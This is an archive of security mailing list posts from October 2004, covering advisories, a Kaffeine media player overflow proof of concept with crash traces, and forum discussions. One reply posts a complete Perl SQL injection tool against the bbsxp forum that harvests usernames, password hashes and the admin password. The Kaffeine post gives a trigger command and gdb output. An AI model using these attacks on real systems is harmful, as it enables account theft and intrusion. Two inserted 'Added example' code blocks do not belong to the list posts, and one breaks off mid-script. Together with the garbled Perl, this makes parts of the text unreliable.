Re: [security] Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in ls and mkdir

2004-10-26 Thread Brett Campbell
On Sun, Oct 24, 2004 at 06:18:41PM -0700, Andrew Farmer wrote:
snip 
 I did a quickie analysis of the program (which is basically just 
 distributed as source!).
snip

when did you get a hold of the tarball? they must've yanked the record
for www.fedora-redhat.com ... it can't be resolved in any way.

pretty interesting (and pathetic) anyways, nice detective work.

-- 
[ Brett R. Campbell ]
 - Configuration Management / Systems Administration
 - Collaborative Agent Design Research Center
 - California Polytechnic State University, SLO, CA
 http://www.cadrc.calpoly.edu/frameset_content/content_about_us.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Kaffeine Media Player Content Type overflow

2004-10-26 Thread KF
Author did not respond and I could not exploit... enjoy.
There will be a proper advisory when I am not being so lazy.
-KF
Kaffeine <= 0.4.2
http://kaffeine.sourceforge.net/download.html

Tested on SuSE Linux 9.1 on source compiled from kaffeine-0.4.3b.tar.bz2;
also tested on various SuSE and Fedora RPMs.

On SuSE Linux 9.1 (i586) - Kernel 2.6.5-7.108-default
http://www.suse.com/us/private/download/linuks/i386/update_for_9_1/extra.html
1558f5f4178cc1acbac0a068fb0bf43c  kaffeine.rpm

ftp://packman.iu-bremen.de/testing/xine-cvs/kaffeine/
kaffeine-0.5cvs-200409180035.i686.rpm

ftp://packman.iu-bremen.de/suse/9.1/i686/
kaffeine-0.4.3b-0.pm.0.i686.rpm

http://rpm.pbone.net/index.php3/stat/17/dept/5/idg/Productivity_Multimedia_Video_Players
kaffeine-0.4.2-6.i586.rpm

Fedora Core release 2.90 (FC3 Test 1) Kernel 2.6.7-1.478custom on an i686
http://rpmseek.com/rpm-pl/kaffeine.html?hl=comcx=0::
kaffeine-0.4.3-0.lvn.1.b.2.i386.rpm
kaffeine-0.4.3-0.lvn.1.b.1.i386.rpm


This can be triggered via any Real Audio Media - ram playlist file. 

kaffeine-0.4.3b/kaffeine/playlist.cpp:
These are your file limitations. 
PlayList::LoadRamPlaylist( const KURL kurl, QListViewItem* after)
..
/* check for ram playlist */
 if ( (ext == "ra") || (ext == "rm") || (ext == "ram") || (ext == "lsc") || (ext == "pl") )
 {
... 
  
The overflow occurs here. 
kaffeine-0.4.3b/kaffeine/http.c:

static http_t *http_open (const char *mrl) {

  http_t   *this;
...
if (sscanf(this->buf, "Content-Type: %s", mime_type) == 1) {


Sample exploitation. 

To cause the exploit, modify /etc/mime.types for the .ram extension: make it
"A" instead of "audio/x-pn-realaudio".

linux:/srv/www/htdocs # echo `perl -e 'print "A" x 316 . "ABCD"'` ram >> /etc/mime.types ; /etc/init.d/apache2 restart
Syntax OK
Shutting down httpd2 (waiting for all children to terminate) done
Starting httpd2 (prefork)

[EMAIL PROTECTED] root]# kaffeine http://192.168.1.207/test.pl
http: content length = 30 bytes
http: content type = 'text/plain;'
http: content length = 0 bytes
http: content type = 
'ABCD'
[EMAIL PROTECTED] root]# KCrash: Application 'kaffeine' crashing...

create a file named exme.ram in your wwwroot 
and create a file named test.pl with the contents:
http://host/exme.ram

Upon reading the test.pl file, either via http or via double click, kaffeine
will attempt to download the file exme.ram. It will check the mimetype
that the server is offering and proceed to copy it into a small buffer.

This can also be exploited by directly viewing the .ram file. 


Exact eip hit looks like this:
(gdb) c
Continuing.
http: content length = 30 bytes
http: content type = 'text/plain;'
http: content length = 0 bytes
http: content type = 
'ABCD'

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -150400896 (LWP 2328)]
0x080b869c in SubtitleChooser::staticMetaObject ()
(gdb) bt
#0  0x080b869c in SubtitleChooser::staticMetaObject ()
#1  0x5a5a5a5a in ?? ()
#2  0x44434241 in ?? ()
#3  0x097a1200 in ?? ()
#4  0x in ?? ()
#5  0x in ?? ()
#6  0x in ?? ()
#7  0x in ?? ()
#8  0xfef17b28 in ?? ()
#9  0x09794b70 in ?? ()
#10 0x05f04ac0 in kde_malloc_is_used () from /usr/lib/libkdecore.so.4
#11 0x0018 in ?? ()
#12 0x05f04ac0 in kde_malloc_is_used () from /usr/lib/libkdecore.so.4
#13 0x096c3770 in ?? ()
#14 0x096c3760 in ?? ()
#15 0x05f04ac0 in kde_malloc_is_used () from /usr/lib/libkdecore.so.4
#16 0xfef17b48 in ?? ()
#17 0x05ec8dea in malloc () from /usr/lib/libkdecore.so.4
Previous frame inner to this frame (corrupt stack?)

(gdb) i f
Stack level 0, frame at 0xfef17ae0:
 eip = 0x80b869c in SubtitleChooser::staticMetaObject(); saved eip 
0x5a5a5a5a
 called by frame at 0xfef17ae4
 Arglist at 0xfef17ad8, args:
 Locals at 0xfef17ad8, Previous frame's sp is 0xfef17ae0
 Saved registers:
  ebp at 0xfef17ad8, eip at 0xfef17adc



0xfeea9b20:  'A' <repeats 200 times>...
0xfeea9be8:  'A' <repeats 116 times>, "ABCD"

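Added example, not Kaffeine's code: the quoted http.c line uses `sscanf` with an unbounded `%s`, so a Content-Type value longer than `mime_type` is written past the end of the buffer (the 316 x 'A' case above). The function below derives the field width from the buffer size and uses `%n` to report truncation instead of overflowing; buffer sizes, the canary self-check and the constructed header lines are assumptions for the demonstration.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/*
 * Width-limited replacement for the pattern
 *   sscanf(this->buf, "Content-Type: %s", mime_type);
 * Returns 1 if the line carried a Content-Type value, 0 otherwise.
 * On success *truncated is 1 when the value did not fit in n-1 bytes.
 */
int parse_content_type(const char *line, char *mime_type, size_t n,
                       int *truncated)
{
    char fmt[32];
    int consumed = 0;

    if (n < 2 || n > 9999)          /* need room for at least 1 char + NUL */
        return 0;

    /* Build "Content-Type: %<n-1>s%n". The width is the only thing that
     * bounds the store, so it is derived from the destination size. */
    snprintf(fmt, sizeof fmt, "Content-Type: %%%zus%%n", n - 1);

    if (sscanf(line, fmt, mime_type, &consumed) != 1)
        return 0;

    /* %n reports how far sscanf read. If the next character is neither
     * whitespace nor end of string, the value continued past the width
     * and was cut off rather than written out of bounds. */
    *truncated = (line[consumed] != '\0' &&
                  !isspace((unsigned char)line[consumed]));
    return 1;
}

/*
 * Self-check with a constructed header: value_len 'A's parsed into a
 * bufsize-byte buffer followed by a canary byte. Returns 1 if the parse
 * succeeded, the truncation flag matched expectations, the stored string
 * has the expected length and the canary survived; 0 on any failure;
 * -1 if the arguments exceed the scratch space.
 */
int check_long_value(size_t value_len, size_t bufsize)
{
    char line[512];
    char guarded[128];
    int truncated = -1;
    size_t expect_len;

    if (value_len > 480 || bufsize < 2 || bufsize >= sizeof guarded)
        return -1;

    memcpy(line, "Content-Type: ", 14);
    memset(line + 14, 'A', value_len);
    memcpy(line + 14 + value_len, "\r\n", 3);       /* copies the NUL too */

    memset(guarded, 0, sizeof guarded);
    guarded[bufsize] = 0x5a;                        /* canary after buffer */

    if (!parse_content_type(line, guarded, bufsize, &truncated))
        return 0;

    expect_len = value_len < bufsize ? value_len : bufsize - 1;
    return truncated == (value_len > bufsize - 1)
        && strlen(guarded) == expect_len
        && guarded[bufsize] == 0x5a;
}

int main(void)
{
    char mime[64];
    int trunc = 0;

    /* Constructed line mirroring the PoC output above. */
    if (parse_content_type("Content-Type: text/plain;\r\n", mime,
                           sizeof mime, &trunc))
        printf("mime='%s' truncated=%d\n", mime, trunc);

    printf("316 x 'A' into 64 bytes: %s\n",
           check_long_value(316, 64) == 1 ? "bounded, canary intact"
                                          : "FAILED");
    return 0;
}
```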


Re: [Full-Disclosure] Q: Linux Command Line Encryption

2004-10-26 Thread Mike Hoye
On Mon, Oct 25, 2004 at 08:33:41AM -0700, Denis Dimick wrote:
 Use GPG and keychain to store the key.

I've written a little widget that lets you "encrypt" a file using
another file as the "key"; I put those things in quotes because 
it's a dumb little thing that does a quick-and-simple xor of the
first file against the other. I realize that this is barely 
something you'd call encryption, but it might fill your needs.

It's called xork and it comes with no warranty whatsoever. 

http://off.net/~mhoye/xork/

If anyone who is smarter than I am would like to suggest anything,
I'd be glad to hear it.

- Mike Hoye

-- 
Theology is the effort to explain the unknowable in terms of the not
worth knowing. - H. L. Mencken



[Full-Disclosure] PTms04-030

2004-10-26 Thread pigrelax
PTms04-030 - tool for checking WebDAV XML DoS vulnerability.

More information and download:

http://www.securitylab.ru/tools/48998.html



Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in ls and mkdir

2004-10-26 Thread Stephen Jimson
snip from the ISC's SANS
The k-otik folks have an analysis of the bad things
that might happen if you follow the instructions in
the fake RedHat advisory that was reported in
yesterday's diary:

http://www.k-otik.com/news/FakeRedhatPatchAnalysis.txt

snip

the source code is also there

Steph


--- Brett Campbell [EMAIL PROTECTED] wrote:

 On Sun, Oct 24, 2004 at 06:18:41PM -0700, Andrew
 Farmer wrote:
 snip 
  I did a quickie analysis of the program (which is
 basically just 
  distributed as source!).
 snip
 
 when did you get a hold of the tarball? they must've
 yanked the record
 for www.fedora-redhat.com ... it can't be resolved
 in any way.
 
 pretty interesting (and pathetic) anyways, nice
 detective work.
 
 -- 
 [ Brett R. Campbell ]
  - Configuration Management / Systems
 Administration
  - Collaborative Agent Design Research Center
  - California Polytechnic State University, SLO, CA
 


[Full-Disclosure] SUSE Security Announcement: xpdf, gpdf, kpdf, pdftohtml, cups (SUSE-SA:2004:039)

2004-10-26 Thread Thomas Biege

-----BEGIN PGP SIGNED MESSAGE-----

__

SUSE Security Announcement

Package:                xpdf, gpdf, kdegraphics3-pdf, pdftohtml, cups
Announcement-ID:        SUSE-SA:2004:039
Date:                   Tuesday, Oct 26th 2004 10:30 MEST
Affected products:      8.1, 8.2, 9.0, 9.1, 9.2
                        SUSE Linux Enterprise Server 8, 9
                        SUSE Linux Desktop 1.0
Vulnerability Type:     remote system compromise
Severity (1-10):        5
SUSE default package:   yes
Cross References:       CAN-2004-0888
                        CAN-2004-0889

Content of this advisory:
1) security vulnerability resolved:
 - integer overflows
 - arithmetic errors
   problem description
2) solution/workaround
3) special instructions and notes
4) package location and checksums
5) pending vulnerabilities, solutions, workarounds:
- freeradius denial of service problems
- mpg123
- squid
6) standard appendix (further information)

__

1) problem description, brief discussion

Xpdf is a widely used fast PDF file viewer. Various other PDF viewer
and PDF conversion tools use xpdf code to accomplish their tasks.
Chris Evans found several integer overflows and arithmetic errors.
Additionally Sebastian Krahmer from the SuSE Security-Team found similar
bugs in xpdf 3.
These bugs can be exploited by tricking a user into opening a malformed PDF
file. As a result the PDF viewer can crash or, possibly, arbitrary code can be
executed.


2) solution/workaround

Due to the wide usage of xpdf-based code we do not recommend switching to
another PDF viewer as a workaround.
You have to install the updates.


3) special instructions and notes

Please restart all running instances of xpdf, gpdf, kpdf, pdftohtml, cups
after updating successfully.


4) package location and checksums

Please download the update package for your distribution and verify its
integrity by the methods listed in section 3) of this announcement.
Then, install the package using the command rpm -Fhv file.rpm to apply
the update.
Our maintenance customers are being notified individually. The packages
are being offered to install from the maintenance web.

Cups packages and all 9.2 packages will be available later.



RE: [Full-Disclosure] Windows Time Synchronization - Best Practices

2004-10-26 Thread Airey, John
 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] Behalf Of Andrew
 Farmer
 Sent: 25 October 2004 20:22
 To: Gary E. Miller
 Cc: Micheal Espinola Jr; [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] Windows Time Synchronization - Best
 Practices
 
 
 On 24 Oct 2004, at 18:48, Gary E. Miller wrote:
  On Fri, 22 Oct 2004, Micheal Espinola Jr wrote:
  You can certainly have multiple time servers specified with Windows
  Time Service (SNTP).  RTM.  It has the ability to failover 
 through a
  list.
 
  Yes you can have multiple time servers, but only one active 
 at a time.
  With NTP your client polls a number of diverse servers.  Routes can
  flap, servers can go wacko, but your time stays solid.
 
 The canonical *NIX ntp client supports multiple active servers, if
 that's what you're talking about.
 
 No idea about Windows, though.

Getting back to the poster's original question, Windows is really bad
for time synchronisation. Whereas you can set an NTP server to
UTC/GMT/ZULU (or whatever other name you are going to call it), Windows
does indeed move the clock forward and backward. 

We've experienced this difficulty ourselves where you log in to a server
which then puts the clock an hour forward and then Windows itself puts
the clock an hour forward. The end result is that the clock is wrong.
Local time should simply be calculated as an offset from UTC. So instead
of changing the clock, change the time zone. Then it won't matter if the
time zone is changed to BST (for example) more than once. The clock and
the offset will stay the same.

Note to Microsoft - fix this stupidity in your next version of Windows.
It will annoy your users to begin with, but a number of time synch
issues will be solved in one fell swoop. All the three letter codes are
publicly available and understood by your end users.

-- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848
[EMAIL PROTECTED] 

Even if Embryonic Stem Cell Research yielded medical treatments, how
could enough eggs be obtained to make them viable? We can't even get
enough organs for transplant donation.



Re: [Full-Disclosure] Q: Linux Command Line Encryption

2004-10-26 Thread Ali Campbell
Thanks to everyone who replied to this, I appreciate your time.
This issue has now been dealt with.
Ali


RE: [Full-Disclosure] Possibly a stupid question RPC over HTTP

2004-10-26 Thread Airey, John
 -Original Message-
 From: Kyle Maxwell [mailto:[EMAIL PROTECTED]
 Sent: 25 October 2004 04:30
 To: Airey, John
 Cc: [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] Possibly a stupid question RPC 
 over HTTP
 
[snip]
 
 You're talking about solving a problem that DOESN'T EXIST BY
 DEFINITION. Re-read my response -- this time without being stupid --
 and you'll see that I was trying to explain to you that the problem is
 the general factoring of large numbers (into primes for what should be
 obvious reasons). This is NOT the same as factoring large primes as
 that's a solved problem. If this is still difficult to understand, any
 handy grade-school maths book should provide additional explanation.
 Testing for primality, which is a related but different problem, is
 solved, but proving that a number is composite is unfortunately not
 the same as knowing its factors.
 /flame
 
 As to the question of whether this is a solved problem: we may have to
 agree to disagree; if it were the NSA, given their past interactions
 with the crypto community, I think it likely that they'd have over
 time moved to another type of cryptography. BTW, brute forcing a key
 does not break the system -- and as others have shown in this thread,
 it's impossible to precompute all the keys unless you've broken every
 single PRNG out there, and that's even less likely.

What is it with this list that people can't reply without being rude? Is it the phase 
of the moon or something? OK, so we can rule out brute force, as storing every prime 
that's possible with 512-bit keys isn't possible in this universe. Anyway, to quote RSA 
Laboratories:

The RSA algorithm works as follows: take two large primes, p and q, and compute their 
product n = pq; n is called the modulus. Choose a number, e, less than n and 
relatively prime to (p-1)(q-1), which means e and (p-1)(q-1) have no common factors 
except 1. Find another number d such that (ed - 1) is divisible by (p-1)(q-1). The 
values e and d are called the public and private exponents, respectively. The public 
key is the pair (n, e); the private key is (n, d). The factors p and q may be 
destroyed or kept with the private key.

It is currently difficult to obtain the private key d from the public key (n, e). 
However if one could factor n into p and q, then one could obtain the private key d. 
Thus the security of the RSA system is based on the assumption that factoring is 
difficult (http://www.rsasecurity.com/rsalabs/node.asp?id=2214)

Therefore my point still stands that if someone does possess a mathematical solution 
to the above, then all bets are off.
(Whoever it was who disagreed about my statements on encryption, please remember the 
context of the thread is about SSL security, not one-time keys).

Getting back to the original question, you can't discover if someone is sending RPC 
over https unless you have a solution to the RSA hard problem above. Nor is it a major 
security issue if someone is using RPC over https either, unless there are flaws in 
the implementation of SSL or RPC that could be exploited by someone else.

This is my last post on the matter which is solely for the purpose of making at least 
one post in this thread sensible and useful for future readers of the archive. All 
future abusive emails on my mathematical abilities will be deleted without response.

-- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 [EMAIL PROTECTED] 

Tag line temporarily removed due to several people being unable and/or unwilling to 
comprehend what I'm talking about.



[Full-Disclosure] Presentation / Paper : Demystifying Penetration Testing

2004-10-26 Thread Debasis Mohanty
Hi All, 

This is to announce the release of a presentation / paper on PenTesting
by HACKINGSPIRITS called "Demystifying Penetration Testing". It is
mostly targeted at those who are new to Penetration Testing (i.e.
Security Officers / Sys Admins / Security Auditors / Security
Enthusiasts, etc.). This presentation will give a clear picture of how pen
testing is done and what the expected results are. Various screenshots
are provided as a proof of concept to give a brief picture of possible
end-results. 

The goals of this presentation / paper are as follows: 

- An overview of how Vulnerability Assessment (VA) & Penetration Testing
(PT) is done
- Defining scope of the assessment
- Types of Penetration Testing
- A brief understanding on how Buffer Overflow works
- How vulnerabilities are scanned and exploited
- What are the end results
- What a Penetration Testing Report should contain

 

It can be downloaded from the following link: 
http://www.hackingspirits.com/eth-hac/papers/whitepapers.asp



Debasis Mohanty
www.hackingspirits.com



SV: [Full-Disclosure] Rendering binary file as HTML makes Mozilla Firefox stop responding or crash

2004-10-26 Thread Peter Kruse
Hi Bipin,

It's not rated as a serious risk, is it?  Simply a DoS.

This is not solely related to trivial memory consumption, either. The
scenario you're describing has been around for ages and is related to system
resources. This is not.

Regards
Peter Kruse

-----Original Message-----
From: bipin gautam [mailto:[EMAIL PROTECTED]]
Sent: 26 October 2004 19:09
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Rendering binary file as HTML makes Mozilla
Firefox stop responding or crash


Yeah, I've been seeing this behavior for a long time...
but I don't think there is anything serious. Firefox
only slows down (using 100% CPU) if you are using a
slow PC. And after the binary file has been completely
loaded, everything works normally..

Frankly, there are lots of such similar bugs. If you
open multiple windows and multiple tabs at once,
Firefox locks/reserves the memory (pagefile) that it's
using even when some of the tabs are closed. You have
to restart Mozilla (close all the open windows) to
free the memory.

huh, nothing serious isn't it..

bipin



Re: [Full-Disclosure] Rendering binary file as HTML makes Mozilla Firefox stop responding or crash

2004-10-26 Thread bipin gautam
Yeah, I've been seeing this behavior for a long time...
but I don't think there is anything serious. Firefox
only slows down (using 100% CPU) if you are using a
slow PC. And after the binary file has been completely
loaded, everything works normally..

Frankly, there are lots of such similar bugs. If you
open multiple windows and multiple tabs at once,
Firefox locks/reserves the memory (pagefile) that it's
using even when some of the tabs are closed. You have
to restart Mozilla (close all the open windows) to
free the memory.

huh, nothing serious isn't it..

bipin



[Full-Disclosure] Multiple AV DoS (part v)

2004-10-26 Thread bipin gautam
Finally, most AV software seems to handle ZIP ARCHIVE
BOMBs easily.  Lately, I was impressed with McAfee
Antivirus. But what a pity, still many AVs die (DoS)
while scanning compressed oversized executables.

http://www.geocities.com/visitbipin/oversize_exe.zip

Currently I know,

Norton AV 2002/2003/2004 pro.
McAfee  4396
Sybari  7.5.1314
TrendMicro  7.000

……SHOULD BE vulnerable to this bug.  I also confirmed
it using www.virustotal.com 

WHAT A PITY. I wonder when AV software will
improve...

bipin gautam

http://www.geocities.com/visitbipin



[Full-Disclosure] Php Nuke Hack's

2004-10-26 Thread .:: DarkDelphi ::.
Hi, I'm a Spanish reader and.. I will try to expose myself..

I need to hack one site created by myself with PHP-Nuke. This site is
hosted on my computer to test the security of PHP-Nuke. I recently
used some hacks like SQL injection, cross-site scripting and cookie
¿kidnapping? (this last one without good results...)

I use the hacks that I found at
http://packetstorm.security-guide.de/assess/ ... ¿Can anyone write or
send more hacks?

Thanks



[Full-Disclosure] Php Nuke Hack's

2004-10-26 Thread str0ke
Please don't expose yourself.

This is all I got for you.

http://www.milw0rm.com/search.php?dong=php-nuke

On Tue, 26 Oct 2004 20:18:51 +0200, .:: DarkDelphi ::.
[EMAIL PROTECTED] wrote:
 Hi, i'm a spanish reader and.. y will try expose myself..




Re: [Full-Disclosure] Php Nuke Hack's

2004-10-26 Thread ntx0f
ever consider writing one yourself?

- Original Message - 
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Sent: Tuesday, October 26, 2004 3:29 PM
Subject: [Full-Disclosure] Php Nuke Hack's


 Please don't expose yourself.
 
 This is all I got for you.
 
 http://www.milw0rm.com/search.php?dong=php-nuke
 
 On Tue, 26 Oct 2004 20:18:51 +0200, .:: DarkDelphi ::.
 [EMAIL PROTECTED] wrote:
  Hi, i'm a spanish reader and.. y will try expose myself..
 
 


[Full-Disclosure] Php Nuke Hack's

2004-10-26 Thread bug free
Please don't expose yourself.
This is all I got for you.
http://www.milw0rm.com/search.php?dong=php-nuke

That is not very cool. See my crack tool for the bbsxp forum. It works
well on 5.00, 4.0beta3 and beta4. Using the crack is just like watching a
movie. It will register a user and get the password for you
automatically.  ;)

-- 
Thanks
bugfree


#!/usr/bin/perl
#
#   This tool is used to crack bbsxp 5.00(access, MSSQL)
#   Deveoped by bugfree ( www.xx.org ) 
#   Thanks theAres for his help on debuging
#

use IO::Socket;
use Getopt::Std;
use HTTP::Request::Common;
use HTTP::Cookies;
use LWP;
use LWP::UserAgent;
use HTML::Form;

$version='1.0';
#$username = 'test';
#$password = 'testt';
$namepass = 'test:test';
$username2 = 'zgtqwpmz123';
$password2 = 'gbhnjm';
$fLoginFail = 0;
$fRegistFail =0;


%options=();
getopts(h:u:,\%options);
(defined $options{h} ) || die Usage(version: . $version . ):
$0\n\t-h www.abc.com/bbs/\n\t-u username:password\n;

$tmpUrl = $options{h}  if defined $options{h};
$namepass = $options{u}  if defined $options{u};
@str = split(:, $namepass);
$username = $str[0];
$password = $str[1];

if ( $tmpUrl =~ /(http:\/\/)?([a-z0-9.]+)\/(.*)/i ) {
$webhost = $2;
$webdir = $3;
$webUrl = $webhost . '/' . $webdir .'/';
$webUrl =~ s/\/\//\//;
$webUrl = 'http://' . $webUrl;
}
else {
die Please use format: -h http://www.target.com/bbs/;;
}

print SQL injection for URL: $webUrl \n;


#Global URL
my $loginPage = $webUrl  . 'login.asp';
my $searchPage = $webUrl . 'search.asp';
my $registPage = $webUrl . 'register.asp';

my $cookies = HTTP::Cookies-new();
my $ua = LWP::UserAgent-new;
$ua-cookie_jar( $cookies );

#loginRegist();
webLogin( $username, $password );
if ( $fLoginFail == 1 ) {
loginRegist( $username2, $password2 );  #try 2nd user
if ( $fRegistFail == 1 ) {
$fLoginFail = 0;
webLogin( $username2, $password2 );
if ( $fLoginFail == 1 ) { die Sorry, Can not login to web \n; }
}

}

#sql injection 
webSearch();


##
# Functions list
#   loginRegist() :register to bbs
#   webLogin()   : web login
#   webSearch()   : web login
##

sub webSearch
{
#injection SQL, Leave a space in the end 
$searchxm = 'forumid=0 union all SELECT 1, forum.forumid,
user.userpass, user.username, forum.content, forum.posttime,
forum.postip, forum.replies, forum.Views, forum.icon, forum.goodtopic,
forum.toptopic, forum.locktopic, forum.deltopic, forum.lastname,
forum.lasttime, clubconfig.adminpassword, forum.pollresult ,
forum.multiplicity FROM [user],forum, clubconfig where user.membercode
 3  OR user.username ';


$request = POST ( $searchPage . '?menu=ok' ,
[
content = 'abcd',
search = 'author',
searchxm = $searchxm,
searchxm2 = 'topic',
TimeLimit = '1',
forumid =''
],
Referer = $searchPage,
Connection = 'Keep-Alive',
User-Agent = 'Mozilla/4.0',
Host = $webhost
); 

$response = $ua-request( $request );

if ( $response-as_string =~ /HTTP\/1.[01] 200/ )
{
print search Success\n;
%passwdGet = ();
@htmlOut= split(\n,$response-as_string);
foreach $v (@htmlOut)
{
if ( $v =~ 
/scriptShowForum\(\d+,([A-Z0-9]{32,32}),.*?,(.*?),.*\/script/
)
{
$passwdGet{$1}=$2;
#print \tUsername: $2\n\tMD5 passwd: $1 . \n;
}
}
while ( my ( $key, $value ) = each %passwdGet )
{
print \tusername: $value\n\tMD5 passwd: $key\n;
}
}
else
{
print $response-as_string. \n;
die search Failed\n;
}

}


sub loginRegist
{

$myusername = $_[0];
$mypassword = $_[1];


$request = POST ( $registPage,
[
username = $myusername,
password = $mypassword,
userpass2 = $mypassword,
usermail = '[EMAIL PROTECTED]',
realname = 'baby',
userface = 'images/face70.gif',
birthday = '',
perlsonal = '',
sign = '',
sex = '',
country = '',
province = '',
city = '',
blood = '',
belief = '',
occupation = '',
marital = '',
education = '',
college = '',
userqq = '',
icq = '',

Re: [Full-Disclosure] xpire.info splitinfinity.info - exploits in the wild

2004-10-26 Thread Elia Florio
Finally, I cleaned the compromised box of my friend :))
I've found (following many helpful suggestions of people on the FD list)
that a variant of the suckit rootkit was installed on this machine.
The strange thing is that rkhunter and chkrootkit don't catch it
in any way and they said that everything is ok.

To find suckit and deactivate it I used this:
http://tsd.student.utwente.nl/skdetect/
It's code based on the suckit source code, but without the malware part.
It can dig into /dev/kmem and explore sys_call_table[];
skdetect was able to find suckit installed.
Another person who was compromised by the xpire.info hacker told me
that the symptoms were the same and also on his host he found this suckit
variant installed.

suckit version 'Q' DETECTED
kernel-part uninstall seems successful.

After reboot everything came back to normal activity.
Thank you to everyone for the answers given to me
(Ron DuFresne, Nick FitzGerald, Kevin and others).

Actually on the xpire.info/fa/?d=get malware page you can find these exploits
in the wild:


There are a lot of backdoors/trojans ready to install and the bad news is that
most of this malware is recompiled, so many AVs are fooled and don't catch it
(for example Symantec and ClamAV don't recognize much of the malware
on this site, after a quick test made with www.virustotal.com).

Bye,
EF



[Full-Disclosure] [USN-7-1] imagemagick vulnerability

2004-10-26 Thread Martin Pitt
===
Ubuntu Security Notice USN-7-1 October 27, 2004
imagemagick vulnerability
CAN-2004-0981
===

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

libmagick6

The problem can be corrected by upgrading the affected package to
version 5:6.0.2.5-1ubuntu1.1. In general, a standard system upgrade is
sufficient to effect the necessary changes.

Details follow:

A buffer overflow in imagemagick's EXIF parsing routine has been
discovered in imagemagick versions prior to 6.1.0. Trying to query
EXIF information of a malicious image file might result in execution
of arbitrary code with the user's privileges.

Since imagemagick can be used in custom printing systems, this also
might lead to privilege escalation (execute code with the printer
spooler's privileges). However, Ubuntu's standard printing system does
not use imagemagick, thus there is no risk of privilege escalation in
a standard installation.





Re: [Full-Disclosure] Possibly a stupid question RPC over HTTP

2004-10-26 Thread Kevin
On Tue, 26 Oct 2004 16:47:21 +0100, Airey, John [EMAIL PROTECTED] wrote:
 Therefore my point still stands that if someone does possess a mathematical solution 
 to the above, then all bets are off.
 (Whoever it was who disagreed about my statements on encryption, please remember the 
 context of the thread is about SSL security, not one-time keys).

Agreed.  Current SSL standards rely on public key encryption methods
which obtain their strength from the difficulty of the factoring
problem.

 Getting back to the original question, you can't discover if someone is sending RPC 
 over https unless you have a solution to the RSA hard problem above. Nor is it a 
 major security issue if someone is using RPC over https either, unless there are 
 flaws in the implementation of SSL or RPC that could be exploited by someone else.

Yes -- however, there are workarounds.
If you control one end point or the other, then you can take steps to
permit examination of the contents of SSL sessions.

Server:
If you control the server, you can of course load the keys into the
sniffer (risky, but not unheard of, see
http://www.radware.com/content/products/ct100/default.asp) or
terminate the SSL session on a device under your control. (For an
RPC-over-HTTP example, see this document:
http://www.msexchange.org/pages/article_p.asp?id=613)

Client:
If you control the client (say a corporate desktop PC), you have
another option -- you can modify the client's list of trusted CAs, and
force the client to establish the SSL session to your proxy server.
This gives the proxy an opportunity to inspect/log/modify the
cleartext contents of the session.  The proxy establishes its own SSL
session to the remote server normally; neither the client nor the server
would be aware of the MITM.

A freeware implementation of this MITM approach was Achilles; I have
also seen at least one commercial product offering this functionality
to permit content-scanning of outbound HTTPS browser traffic.

Kevin Kadow



[Full-Disclosure] [USN-8-1] gaim vulnerabilities

2004-10-26 Thread Martin Pitt
===
Ubuntu Security Notice USN-8-1 October 27, 2004
gaim vulnerabilities
CAN-2004-0891
===

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

gaim

The problem can be corrected by upgrading the affected package to
version 1:1.0.0-1ubuntu1.1. In general, a standard system upgrade is
sufficient to effect the necessary changes.

Details follow:

A buffer overflow and two remote crashes were recently discovered in
gaim's MSN protocol handler. An attacker could potentially execute
arbitrary code with the user's privileges by crafting and sending a
particular MSN message.





[Full-Disclosure] [USN-5-1] gettext vulnerabilities

2004-10-26 Thread Martin Pitt
===
Ubuntu Security Notice USN-5-1 October 27, 2004
gettext vulnerabilities
CAN-2004-0966
===

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

gettext

The problem can be corrected by upgrading the affected package to
version 0.14.1-2ubuntu0.1. In general, a standard system upgrade is
sufficient to effect the necessary changes.

Details follow:

Recently, Trustix Secure Linux discovered some vulnerabilities in the
gettext package. The programs autopoint and gettextize created
temporary files in an insecure way, which allowed a symlink attack to
create or overwrite arbitrary files with the privileges of the user
invoking the program.
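As an added illustration of the temporary-file bug class this notice describes (an example script written for this page, not code from gettext, autopoint, gettextize or the Ubuntu notice), the predictable-name pattern is shown beside a mktemp-based one; the scratch directory, the "victim" file and the planted symlink are constructed for the demo and stand in for the real /tmp.

```shell
#!/bin/sh
# Added example: predictable temp file (the CAN-2004-0966 pattern) versus
# mktemp. Everything happens under a private scratch directory, never /tmp.
set -u
SCRATCH=$(mktemp -d) || exit 1
trap 'rm -rf "$SCRATCH"' EXIT

# Weak pattern: a name anyone can guess (script name plus PID), opened with a
# plain redirect. If a symlink already sits at that path, the write follows
# the link and overwrites whatever it points to.
weak_write() {
    tmp="$SCRATCH/gettext.$1"          # $1 plays the role of the script's PID
    printf 'new content\n' > "$tmp"
}

# Hardened pattern: mktemp creates a brand-new file (O_CREAT|O_EXCL) under a
# random name, so a pre-planted symlink at a guessed path is never followed.
safe_write() {
    tmp=$(mktemp "$SCRATCH/gettext.XXXXXX") || return 1
    printf 'new content\n' > "$tmp"
    printf '%s\n' "$tmp"
}

# Constructed victim file plus a symlink planted at the predictable name.
target="$SCRATCH/victim"
printf 'original\n' > "$target"
ln -s "$target" "$SCRATCH/gettext.4242"

weak_write 4242
weak_result=$(cat "$target")           # "new content": the link was followed

printf 'original\n' > "$target"
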